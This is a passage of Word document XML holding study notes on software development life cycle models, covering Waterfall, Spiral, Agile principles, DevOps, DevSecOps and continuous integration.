          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Finally, software enters an operational phase with support, maintenance, and other operational activities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BAD9EA" w14:textId="2BA46767" w:rsidR="00001529" w:rsidRDefault="00001529" w:rsidP="0000152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While waterfall is straight-forward, it is being replaced</w:t>
      </w:r>
      <w:r w:rsidR="00D02FDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in many organizations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> because it is inflexible</w:t>
      </w:r>
      <w:r w:rsidR="00D02FDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439F3451" w14:textId="1724A61D" w:rsidR="00B876D6" w:rsidRDefault="00B876D6" w:rsidP="00B876D6">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It is not highly responsive to changes and does not account for internal iterative work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9CE848" w14:textId="5EC22D9A" w:rsidR="00B876D6" w:rsidRDefault="00B876D6" w:rsidP="00B876D6">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Recommended for development efforts that involve fixed scope and a known timeframe for delivery</w:t>
      </w:r>
      <w:r w:rsidR="00FC3C8B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> where stable, well-understood technology is being used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237E62E3" w14:textId="06B2DF5F" w:rsidR="00FC3C8B" w:rsidRDefault="00FC3C8B" w:rsidP="00FC3C8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Spiral</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A8048A" w14:textId="68815390" w:rsidR="009E5B6C" w:rsidRDefault="00060840" w:rsidP="009E5B6C">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Uses linear development concepts from the Waterfall model and adds an iterative process that revisits four phases multiple times during the development life cycle</w:t>
      </w:r>
      <w:r w:rsidR="009E5B6C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB66871" w14:textId="029F711D" w:rsidR="009E5B6C" w:rsidRDefault="009E5B6C" w:rsidP="009E5B6C">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In addition,</w:t>
      </w:r>
      <w:r w:rsidR="00302C8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> this model puts significant emphasis on risk assessment as part of the SDLC, reviewing risks multiple times during the development process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7872E4E4" w14:textId="3F19E44C" w:rsidR="00E76399" w:rsidRDefault="00E76399" w:rsidP="00E7639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There are four main phases which are visited repeatedly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A20EF0" w14:textId="623F85F0" w:rsidR="00E76399" w:rsidRDefault="00E76399" w:rsidP="00E7639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1. </w:t>
      </w:r>
      <w:r w:rsidRPr="007918EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Identification, or requirements gathering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, which initially gathers business requirements, system requirements, and more detailed requirements for subsystems or modules as the process continues. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7150E9B8" w14:textId="169B6984" w:rsidR="00796469" w:rsidRDefault="00796469" w:rsidP="00E7639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2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B33D84">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Design</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, conceptual, architectural, logical, and sometimes physical or final design.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEC5D23" w14:textId="38BA31B9" w:rsidR="00796469" w:rsidRDefault="00796469" w:rsidP="00E7639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3. </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, which produces an initial proof of concept and then further development releases until the final production build is produced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019A261A" w14:textId="6F5FFB9D" w:rsidR="003A1FE1" w:rsidRDefault="003A1FE1" w:rsidP="00E7639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4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00164809">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Evaluation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, which involves risk analysis for the development project intended to </w:t>
      </w:r>
      <w:r w:rsidR="00164809">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>monitor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00164809">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>feasibility</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of delivering the software from a technical and managerial </w:t>
      </w:r>
      <w:r w:rsidR="00164809">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>viewpoint. As the dev cycle continues, this phase also involves customer testing and feedback to ensure customer acceptance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625342D1" w14:textId="1FFF45B9" w:rsidR="001B3CDD" w:rsidRDefault="001B3CDD" w:rsidP="001B3CD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 Spiral Model provides greater flexibility to handle changes in requirements as well as external influences such as availability of customer feedback and development staff.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B760C18" w14:textId="0D25DA8F" w:rsidR="00BA56E8" w:rsidRDefault="00BA56E8" w:rsidP="00BA56E8">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It also allows the software dev cycle to start earlier in the process than the Waterfall Model.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362ECEBE" w14:textId="11BC85A2" w:rsidR="00C276FB" w:rsidRDefault="00C276FB" w:rsidP="00C276F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Because Spiral revisits processes, it is possible for </w:t>
      </w:r>
      <w:r w:rsidR="00B2229C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a project to undergo significant design changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C40F705" w14:textId="0A36ADA6" w:rsidR="00B2229C" w:rsidRPr="00E9039E" w:rsidRDefault="00D3641B" w:rsidP="00B2229C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9039E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Agile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F932EF" w14:textId="73848B29" w:rsidR="00D3641B" w:rsidRDefault="00D3641B" w:rsidP="00D3641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Agile software development is an iterative and incremental process, rather than the linear processes that </w:t>
      </w:r>
      <w:r w:rsidR="00D527E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Waterfall and Spiral use.</w:t>
      </w:r>
      <w:r w:rsidR="007516AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Agile is rooted in the Manifesto for Agile Software Development, a document that has four basic premises:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA36B4C" w14:textId="05861422" w:rsidR="007516AE" w:rsidRDefault="00D3201B" w:rsidP="007516AE">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Individual and interactions are more important than processes and tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B2767D" w14:textId="54D8FC55" w:rsidR="00D3201B" w:rsidRDefault="00D3201B" w:rsidP="007516AE">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Working software is preferable to comprehensive documentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E7BE93" w14:textId="68EA33D8" w:rsidR="00D3201B" w:rsidRDefault="00D3201B" w:rsidP="007516AE">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Customer collaboration replace</w:t>
      </w:r>
      <w:r w:rsidR="00ED4853">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s contract negotiation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A279448" w14:textId="640F8E1A" w:rsidR="00ED4853" w:rsidRDefault="00ED4853" w:rsidP="007516AE">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Responding to change is key, rather than following a plan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF7E7A4" w14:textId="43605B4C" w:rsidR="00ED4853" w:rsidRDefault="00ED4853" w:rsidP="00ED485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Agile tends to break up work into smaller units, allowing work to be done more quickly and with less up-front planning. It focuses on adap</w:t>
      </w:r>
      <w:r w:rsidR="00E36F0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ting to needs</w:t>
      </w:r>
      <w:r w:rsidR="00B55440">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, rather than predicting them, with major milestones identified early in the process but subject to changes as the project continues to develop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8E3566" w14:textId="583FD3BF" w:rsidR="00B55440" w:rsidRDefault="009E544F" w:rsidP="00ED485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Work is typically broken up into short working sessions called </w:t>
      </w:r>
      <w:r w:rsidR="0037679B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sprints</w:t>
      </w:r>
      <w:r w:rsidR="0037679B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, that can last days to a few weeks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A169F2D" w14:textId="49493CE7" w:rsidR="0037679B" w:rsidRDefault="0037679B" w:rsidP="00ED485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When the developer and customer agree that the task is done or when the time allocated for the sprints is complete, the development effort is complete. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1E5A1D" w14:textId="0C14BE2F" w:rsidR="000A558D" w:rsidRPr="002E6790" w:rsidRDefault="000A558D" w:rsidP="00ED4853">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E6790">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Agile methodology is based on 12 principles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E2A66E" w14:textId="61872A9B" w:rsidR="000A558D" w:rsidRDefault="002F0A1C" w:rsidP="000A558D">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Ensure customer satisfaction early and continuous delivery of the software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A52676A" w14:textId="3E2467D5" w:rsidR="002F0A1C" w:rsidRDefault="002F0A1C" w:rsidP="000A558D">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Welcome changing requirements, even late in the development process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248CB6A1" w14:textId="5933A2A1" w:rsidR="002F0A1C" w:rsidRDefault="002F0A1C" w:rsidP="000A558D">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Deliver working software frequently (in weeks rather than months)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C2D7F4" w14:textId="53DB43CE" w:rsidR="002F0A1C" w:rsidRDefault="002F0A1C" w:rsidP="000A558D">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Ensure daily cooperation between developers and businesspeople.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDFDB89" w14:textId="3B73F7F2" w:rsidR="002F0A1C" w:rsidRDefault="001C20CF" w:rsidP="000A558D">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Projects should be built around motivated </w:t>
      </w:r>
      <w:r w:rsidR="00F47BA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>individuals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> who get the support, trust, and environment they need to succeed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0338E427" w14:textId="54F18FB4" w:rsidR="001C20CF" w:rsidRDefault="001C20CF" w:rsidP="000A558D">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Face-to-face conversations are the most efficient way to convey information inside the development team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA25A02" w14:textId="76848C8F" w:rsidR="001C20CF" w:rsidRDefault="00C91064" w:rsidP="000A558D">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Progress is measured by having working software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718A1E26" w14:textId="1D51152A" w:rsidR="00C91064" w:rsidRDefault="00C91064" w:rsidP="000A558D">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Development should be done at a sustainable pace that can be maintained on an ongoing basis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD9765D" w14:textId="332418B9" w:rsidR="00C91064" w:rsidRDefault="00C91064" w:rsidP="000A558D">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Pay continuous </w:t>
      </w:r>
      <w:r w:rsidR="00AD69A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>attention to technical excellence and good design.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAD8B13" w14:textId="547DD7CB" w:rsidR="00AD69A2" w:rsidRDefault="00AD69A2" w:rsidP="000A558D">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Simplicity is the art of maximizing the amount of work not done, which is essential.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB3145F" w14:textId="32725C86" w:rsidR="00AD69A2" w:rsidRDefault="00AD69A2" w:rsidP="000A558D">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The best architectures, requirements, and designs emerge from self-organ</w:t>
      </w:r>
      <w:r w:rsidR="00F47BA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>iz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ing teams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD0E7A7" w14:textId="526FBA91" w:rsidR="00AD69A2" w:rsidRDefault="00AD69A2" w:rsidP="000A558D">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Teams should reflect how to become more effective and then implement that behavior at regular intervals. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154B9733" w14:textId="3146B34E" w:rsidR="00E376F0" w:rsidRDefault="00696B99" w:rsidP="00696B9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These principles drive an SDLC process that is less </w:t>
      </w:r>
      <w:r w:rsidR="00357D9C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>formally</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> structured than Spiral or </w:t>
      </w:r>
      <w:r w:rsidR="00357D9C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Waterfall but</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> has many opportunities for customer feedback and revision.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0FA7FA" w14:textId="636E48C7" w:rsidR="00357D9C" w:rsidRDefault="00357D9C" w:rsidP="00357D9C">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It can also react more nimbly to problems, creating an advantage when security issues are discovered. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04577D3A" w14:textId="0FDA6A64" w:rsidR="00357D9C" w:rsidRPr="006768B1" w:rsidRDefault="001A5172" w:rsidP="00FE7811">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006768B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DevSecOps and DevOps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B800026" w14:textId="03608B17" w:rsidR="001A5172" w:rsidRDefault="001A5172" w:rsidP="001A5172">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006768B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DevOps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> combines software development and IT operations with the goal of optimizing the SDLC</w:t>
      </w:r>
      <w:r w:rsidR="001404AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EF13D6" w14:textId="39E1A3AA" w:rsidR="001404AB" w:rsidRDefault="001404AB" w:rsidP="001A517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This is done by using a collection of tools called </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>toolchains</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to improve the coding, building and test, packaging, release, configuration and management</w:t>
      </w:r>
      <w:r w:rsidR="00563FCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, and monitoring elements of a software development life cycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7D1A45" w14:textId="00E5530A" w:rsidR="00563FCD" w:rsidRDefault="00563FCD" w:rsidP="001A5172">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006768B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DevSecOps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> describes security as part of the DevOps model, where security is a shared responsibility that is a part of the entire development and operations cycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5D264D" w14:textId="37DA19E9" w:rsidR="00B01E69" w:rsidRDefault="001441FC" w:rsidP="00E5144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That means integrating security into the design, development, testing, and operational work done to produce applications and services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577D2384" w14:textId="42FFF07F" w:rsidR="00966142" w:rsidRDefault="00966142" w:rsidP="0096614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Dev</w:t>
      </w:r>
      <w:r w:rsidR="006768B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ops and DevSecOps are often combined with continuous integration and continuous deployment methodologies, where they can rely on automated security testing, and integrated security tooling, including scanning, updates, and configuration management tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAC9CDD" w14:textId="50C6897D" w:rsidR="006768B1" w:rsidRPr="006768B1" w:rsidRDefault="006768B1" w:rsidP="006768B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006768B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Continuous Integration and Continuous Deployment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7803F4B5" w14:textId="630F9F8F" w:rsidR="006768B1" w:rsidRDefault="006768B1" w:rsidP="006768B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006768B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Continuous Integration (CI) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>is a development practice that checks code into a shared repository on a consistent basis.</w:t>
      </w:r>
    </w:p>
